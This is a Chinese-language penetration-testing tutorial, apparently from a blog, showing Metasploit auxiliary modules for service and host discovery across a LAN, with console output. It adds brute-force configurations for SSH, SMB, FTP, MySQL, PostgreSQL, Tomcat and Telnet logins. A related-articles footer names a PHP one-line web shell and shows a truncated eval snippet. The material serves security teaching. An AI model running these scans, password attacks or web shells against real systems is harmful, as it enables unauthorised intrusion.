MSF 服务发现

常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等.

MSF模块搜索:

[root@localhost ~]# msfconsole

msf5 > search scanner type:auxiliary

msf5 > search scanner/http type:auxiliary        // 搜索所有与HTTP相关的模块

发现HTTP服务: 基于scanner/http/http_version发现HTTP服务.

msf5 > use scanner/http/http_version

msf5 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier

   RPORT    80               yes       The target port (TCP)

   SSL      false            no        Negotiate SSL/TLS for outgoing connections

   THREADS  1                yes       The number of concurrent threads

   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/http/http_version) > set rport 80

rport => 80

msf5 auxiliary(scanner/http/http_version) > exploit

[+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php )

[+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php )

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

发现SMB服务: 基于scanner/smb/smb_version发现SMB服务.

msf5 > use scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier

   SMBDomain  .                no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/smb/smb_version) > set threads 10

threads => 10

msf5 auxiliary(scanner/smb/smb_version) > exploit

[+] 192.168.1.2:445       - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark)

[*] 192.168.1.7:445       - Host could not be identified: Windows 6.1 (Samba 4.8.3)

[*] 192.168.1.0/24:445    - Scanned  26 of 256 hosts (10% complete)

[*] 192.168.1.0/24:445    - Caught interrupt from the console...

[*] Auxiliary module execution completed

发现FTP服务: 基于scanner/ftp/ftp_version发现FTP服务

msf5 > use scanner/ftp/ftp_version

msf5 auxiliary(scanner/ftp/ftp_version) > show options

Module options (auxiliary/scanner/ftp/ftp_version):

   Name     Current Setting      Required  Description

   ----     ---------------      --------  -----------

   FTPPASS  mozilla@example.com  no        The password for the specified username

   FTPUSER  anonymous            no        The username to authenticate as

   RHOSTS   192.168.1.0/24       yes       The target address range or CIDR identifier

   RPORT    21                   yes       The target port (TCP)

   THREADS  10                   yes       The number of concurrent threads

msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10

threads => 10

msf5 auxiliary(scanner/ftp/ftp_version) > exploit

[+] 192.168.1.7:21        - FTP Banner: '220 (vsFTPd 3.0.2)\x0d\x0a'

[*] 192.168.1.0/24:21     - Scanned  32 of 256 hosts (12% complete)

[*] 192.168.1.0/24:21     - Caught interrupt from the console...

[*] Auxiliary module execution completed

发现SSH服务: 基于auxiliary/scanner/ssh/ssh_version发现SSH服务

msf5 > use auxiliary/scanner/ssh/ssh_version

msf5 auxiliary(scanner/ssh/ssh_version) > show options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier

   RPORT    22               yes       The target port (TCP)

   THREADS  10               yes       The number of concurrent threads

   TIMEOUT  30               yes       Timeout for the SSH probe

msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10

threads => 10

msf5 auxiliary(scanner/ssh/ssh_version) > exploit

[+] 192.168.1.7:22        - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )

[*] 192.168.1.0/24:22     - Caught interrupt from the console...

[*] Auxiliary module execution completed

发现Telnet服务: 基于auxiliary/scanner/telnet/telnet_version发现TELNET服务

msf5 > use auxiliary/scanner/telnet/telnet_version

msf5 auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   PASSWORD                   no        The password for the specified username

   RHOSTS    192.168.1.0/24   yes       The target address range or CIDR identifier

   RPORT     23               yes       The target port (TCP)

   THREADS   10               yes       The number of concurrent threads

   TIMEOUT   30               yes       Timeout for the Telnet probe

   USERNAME                   no        The username to authenticate as

msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/telnet/telnet_version) > set threads 10

threads => 10

msf5 auxiliary(scanner/telnet/telnet_version) > exploit

[-] 192.168.1.1:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23).

[-] 192.168.1.7:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23).

[-] 192.168.1.0:23        - A network issue has occurred: The host (192.168.1.0:23) was unreachable.

[-] 192.168.1.10:23       - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23).

[-] 192.168.1.3:23        - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23).

[-] 192.168.1.5:23        - A network issue has occurred: The host (192.168.1.5:23) was unreachable.

[*] 192.168.1.0/24:23     - Caught interrupt from the console...

[*] Auxiliary module execution completed

发现MySQL服务: 基于auxiliary/scanner/mysql/mysql_version发现mysql服务

msf5 > use auxiliary/scanner/mysql/mysql_version

msf5 auxiliary(scanner/mysql/mysql_version) > show options

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS   192.168.1.7      yes       The target address range or CIDR identifier

   RPORT    3306             yes       The target port (TCP)

   THREADS  1                yes       The number of concurrent threads

msf5 auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.1.7

rhosts => 192.168.1.7

msf5 auxiliary(scanner/mysql/mysql_version) > set rport 3306

rport => 3306

msf5 auxiliary(scanner/mysql/mysql_version) > exploit

[*] 192.168.1.7:3306      - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.7' is not allowed to connect to this MariaDB server

[*] 192.168.1.7:3306      - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

发现MSSQL服务: 基于auxiliary/scanner/mssql/mssql_ping发现SQL Server服务

msf5 > use auxiliary/scanner/mssql/mssql_ping

msf5 auxiliary(scanner/mssql/mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description

   ----                 ---------------  --------  -----------

   PASSWORD                              no        The password for the specified username

   RHOSTS               192.168.1.0/24   yes       The target address range or CIDR identifier

   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"

   THREADS              10               yes       The number of concurrent threads

   USERNAME             sa               no        The username to authenticate as

   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10

threads => 10

msf5 auxiliary(scanner/mssql/mssql_ping) > run

发现Oracle服务: 基于auxiliary/scanner/oracle/tnslsnr_version发现Oracle服务

msf5 > use auxiliary/scanner/oracle/tnslsnr_version

msf5 auxiliary(scanner/oracle/tnslsnr_version) > show options

Module options (auxiliary/scanner/oracle/tnslsnr_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS   192.168.1.0/24   yes       The target address range or CIDR identifier

   RPORT    1521             yes       The target port (TCP)

   THREADS  10               yes       The number of concurrent threads

msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10

threads => 10

msf5 auxiliary(scanner/oracle/tnslsnr_version) > run

## MSF 主机的发现

MSF提供了一些辅助模块,可以实现主机发现,这些模块位于modules/auxiliary/scanner/discovery/目录中,主要有以下几个arp_sweep,ipv6_multicast_ping,ipv6_neighbor,ipv6_neighbor_router_advertisement,udp_probe,udp_sweep,接下来主要看常用的几个模块的使用技巧.

ARP发现内网主机: 基于scanner/discovery/arp_sweep发现内网存活主机.

msf5 > use scanner/discovery/arp_sweep

msf5 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface

   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier

   SHOST                       no        Source IP Address

   SMAC                        no        Source MAC Address

   THREADS    10               yes       The number of concurrent threads

   TIMEOUT    5                yes       The number of seconds to wait for new data

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10

threads => 10

msf5 auxiliary(scanner/discovery/arp_sweep) > exploit

[+] 192.168.1.1 appears to be up (UNKNOWN).

[+] 192.168.1.2 appears to be up (UNKNOWN).

[+] 192.168.1.2 appears to be up (UNKNOWN).

[+] 192.168.1.1 appears to be up (UNKNOWN).

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed

UDP发现内网主机: 基于scanner/discovery/udp_sweep发现内网存活主机.

msf5 > use scanner/discovery/udp_sweep

msf5 auxiliary(scanner/discovery/udp_sweep) > show options

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to probe in each set

   RHOSTS     192.168.1.0/24   yes       The target address range or CIDR identifier

   THREADS    10               yes       The number of concurrent threads

msf5 auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.0/24

rhosts => 192.168.1.0/24

msf5 auxiliary(scanner/discovery/udp_sweep) > exploit

[*] Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts)

[*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:<20>:U :lysahrk:<00>:U :lyshark:<00>:G :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :a4:be:c8:fe:ac:z4)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed

ACK发现内网主机: 基于auxiliary/scanner/portscan/ack扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/ack

msf5 auxiliary(scanner/portscan/ack) > show options

Module options (auxiliary/scanner/portscan/ack):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   DELAY      0                yes       The delay between connections, per thread, in milliseconds

   INTERFACE                   no        The name of the interface

   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.

   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    10               yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7

rhosts => 192.168.1.7

msf5 auxiliary(scanner/portscan/ack) > set threads 10

threads => 10

msf5 auxiliary(scanner/portscan/ack) > exploit

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

SYN发现内网主机: 基于auxiliary/scanner/portscan/syn扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/syn

msf5 auxiliary(scanner/portscan/syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   DELAY      0                yes       The delay between connections, per thread, in milliseconds

   INTERFACE                   no        The name of the interface

   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.

   PORTS      1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS     192.168.1.7      yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    10               yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7

rhosts => 192.168.1.7

msf5 auxiliary(scanner/portscan/syn) > set threads 10

threads => 10

msf5 auxiliary(scanner/portscan/syn) > run

TCP发现内网主机: 基于auxiliary/scanner/portscan/tcp扫描内网存活主机.

msf5 > use auxiliary/scanner/portscan/tcp

msf5 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description

   ----         ---------------  --------  -----------

   CONCURRENCY  10               yes       The number of concurrent ports to check per host

   DELAY        0                yes       The delay between connections, per thread, in milliseconds

   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.

   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS       192.168.1.7      yes       The target address range or CIDR identifier

   THREADS      10               yes       The number of concurrent threads

   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7

rhosts => 192.168.1.7

msf5 auxiliary(scanner/portscan/tcp) > set threads 10

threads => 10

msf5 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.7:          - 192.168.1.7:21 - TCP OPEN

[+] 192.168.1.7:          - 192.168.1.7:22 - TCP OPEN

[+] 192.168.1.7:          - 192.168.1.7:80 - TCP OPEN

[+] 192.168.1.7:          - 192.168.1.7:139 - TCP OPEN

[+] 192.168.1.7:          - 192.168.1.7:445 - TCP OPEN

[*] 192.168.1.7:          - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

### MSF 服务爆破

对于发现的服务,下一个目标就是尝试爆破其登陆密码,爆破是否能够成功,这里需要有一个社工好了的字典,这里只是演示几个服务爆破的使用方法,这里只演示爆破的配置,爆破时间过长,不做具体实验.

SSH口令爆破:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.7

set username root

set pass_file /root/pass.txt

set threads 10

exploit

Samba口令爆破:

use auxiliary/scanner/smb/smb_login

set rhosts 192.168.1.7

set user_file /root/user.txt

set pass_file /root/pass.txt

set threads 10

exploit

FTP口令爆破:

use scanner/ftp/ftp_login

set rhosts 192.168.1.7

set user_file /root/user.txt

set pass_file /root/pass.txt

set threads 10

exploit

MySQL口令爆破:

search mysql

use auxiliary/scanner/mysql/mysql_login

set rhosts 192.168.1.7

set user_file /root/user.txt

set pass_file /root/pass.txt

exploit

Postgresql口令爆破:

use auxiliary/scanner/postgres/postgres_login

set rhosts 192.168.1.7

set user_file /root/user.txt

set pass_file /root/pass.txt

exploit

Tomcat口令爆破:

search tomcat

use auxiliary/scanner/http/tomcat_mgr_login

set rhosts 192.168.1.7

set user_file /root/user.txt

set pass_file /root/pass.txt

exploit

Telnet口令爆破:

use auxiliary/scanner/telnet/telnet_login

set rhosts 192.168.1.7

set username administrator

set pass_file /root/pass.txt

exploit

MFS 服务扫描与爆破的更多相关文章

  1. 小白日记11:kali渗透测试之服务扫描-banner、dmitry、nmap特征库、操作系统识别、SNMP

    服务扫描 不能单纯的以端口辨别服务.很多网络服务是漏洞频发的高危对象,对网络上的特定服务进行扫描,往往能让我们少走弯路,增加渗透成功的几率.确定开放端口后,通常会对相应端口上所运行服务的信息进行更深入 ...

  2. metasploit常用服务扫描和利用模块

    metasploit常用服务扫描和利用模块 SMB扫描 smb枚举auxiliary/scanner/smb/smb_enumusers 扫描命名管道auxiliary/scanner/smb/pip ...

  3. Kali学习笔记12:服务扫描

    关于什么是服务扫描不多介绍,通俗来看: 我已经扫描到目标机器某个端口开放,接下来我需要知道开放这个端口的是什么应用 情景: 我的Kali机器IP地址:192.168.22.130 我要扫描的Metas ...

  4. Linux常用网络工具:批量主机服务扫描之netcat

    netcat又叫做瑞士军刀,是黑客和系统管理员常用的网络工具,最初开发的目的是文件传输,后来发展出很多强大的功能,比如也可以完成批量主机服务扫描. 之前介绍了另一个更常用的批量主机服务扫描工具:nma ...

  5. Linux常用网络工具:批量主机服务扫描之nmap

    Linux下有很多强大网络扫描工具,网络扫描工具可以分为:主机扫描.主机服务扫描.路由扫描等. 之前已经写过常用的主机扫描和路由扫描工具,nmap支持批量主机扫描和主机服务扫描. nmap的安装直接使 ...

  6. Oracle服务扫描工具Oscanner

    Oracle服务扫描工具Oscanner   Oracle是甲骨文公司推出的关系型数据库,适用于中大规模数据存储,如大型企业.电信.银行等行业.Kali Linux集成了Oracle服务扫描专向工具O ...

  7. 内网探测之SPN服务扫描及相关利用

    在写下一个大块之前,补充一些小知识点,也没啥新东西 0x01简介 如果常规扫描服务,结果不理想,非常GG,可以考虑使用SPN进行服务扫描,这是为了借助Kerberos的正常查询行为(向域控发起LDAP ...

  8. 小白日记13:kali渗透测试之服务扫描(三)-SMTB扫描、防火墙识别、负载均衡识别、WAF识别

    SMTP扫描 SMTP(Simple Mail Transfer Protocol)即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则,由它来控制信件的中转方式.SMTP协议属于TCP/ ...

  9. metasploit framework(十):SSH扫描、爆破

    SSH版本扫描 SSH密码爆破 设置爆破字典 run开始

随机推荐

  1. ABAP-IDOC配置

    转载路径: http://www.cnblogs.com/jiangzhengjun/p/4292135.html#_Toc411677431 https://wenku.baidu.com/view ...

  2. html背景图星际导航图练习

    html <body>         <div class="box1">            <div></div>      ...

  3. vue 未完待续

    1. v-text:主要用来更新textContent,可以等同于JS的text属性. <span v-text="msg"></span> 这两者等价: ...

  4. P45 实践作业

    1. 影评: 观众数量多少,决定被虐者死亡速度的快慢.这一新奇但是残忍的想法,无疑是<网络杀机>的点睛之笔.公众.媒体对凶手网站主造成的伤害,比起那些用恶毒言论还要让人难受千百倍.他是一个 ...

  5. springboot整合websocket实现一对一消息推送和广播消息推送

    maven依赖 <dependency> <groupId>org.springframework.boot</groupId> <artifactId> ...

  6. Linux 子网掩码计算, 二进制十进制互相转换

    看下边例子 192.168.0.1/24 192.168.0.1/32 192.168.0.1/28 上边24,32,28对应的掩码都是什么,怎么计算的 24,32,28,对应的就是多少个二进制的1 ...

  7. mysql面试题集

    Mysql 的存储引擎,myisam和innodb的区别. 答: 1.MyISAM 是非事务的存储引擎,适合用于频繁查询的应用.表锁,不会出现死锁,适合小数据,小并发.5.6之前默认myisam 2. ...

  8. 65. Valid Number 判断字符串是不是数字

    [抄题]: Validate if a given string is numeric. Some examples:"0" => true" 0.1 " ...

  9. c++矩阵运算库Eigen简介

    C++矩阵运算库Eigen介绍 C++中的矩阵运算库常用的有Armadillo,Eigen,OpenCV,ViennaCL,PETSc等.我自己在网上搜了一下不同运算库的特点,最后选择了Eigen.主 ...

  10. 一句话shell【php】

    1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_P ...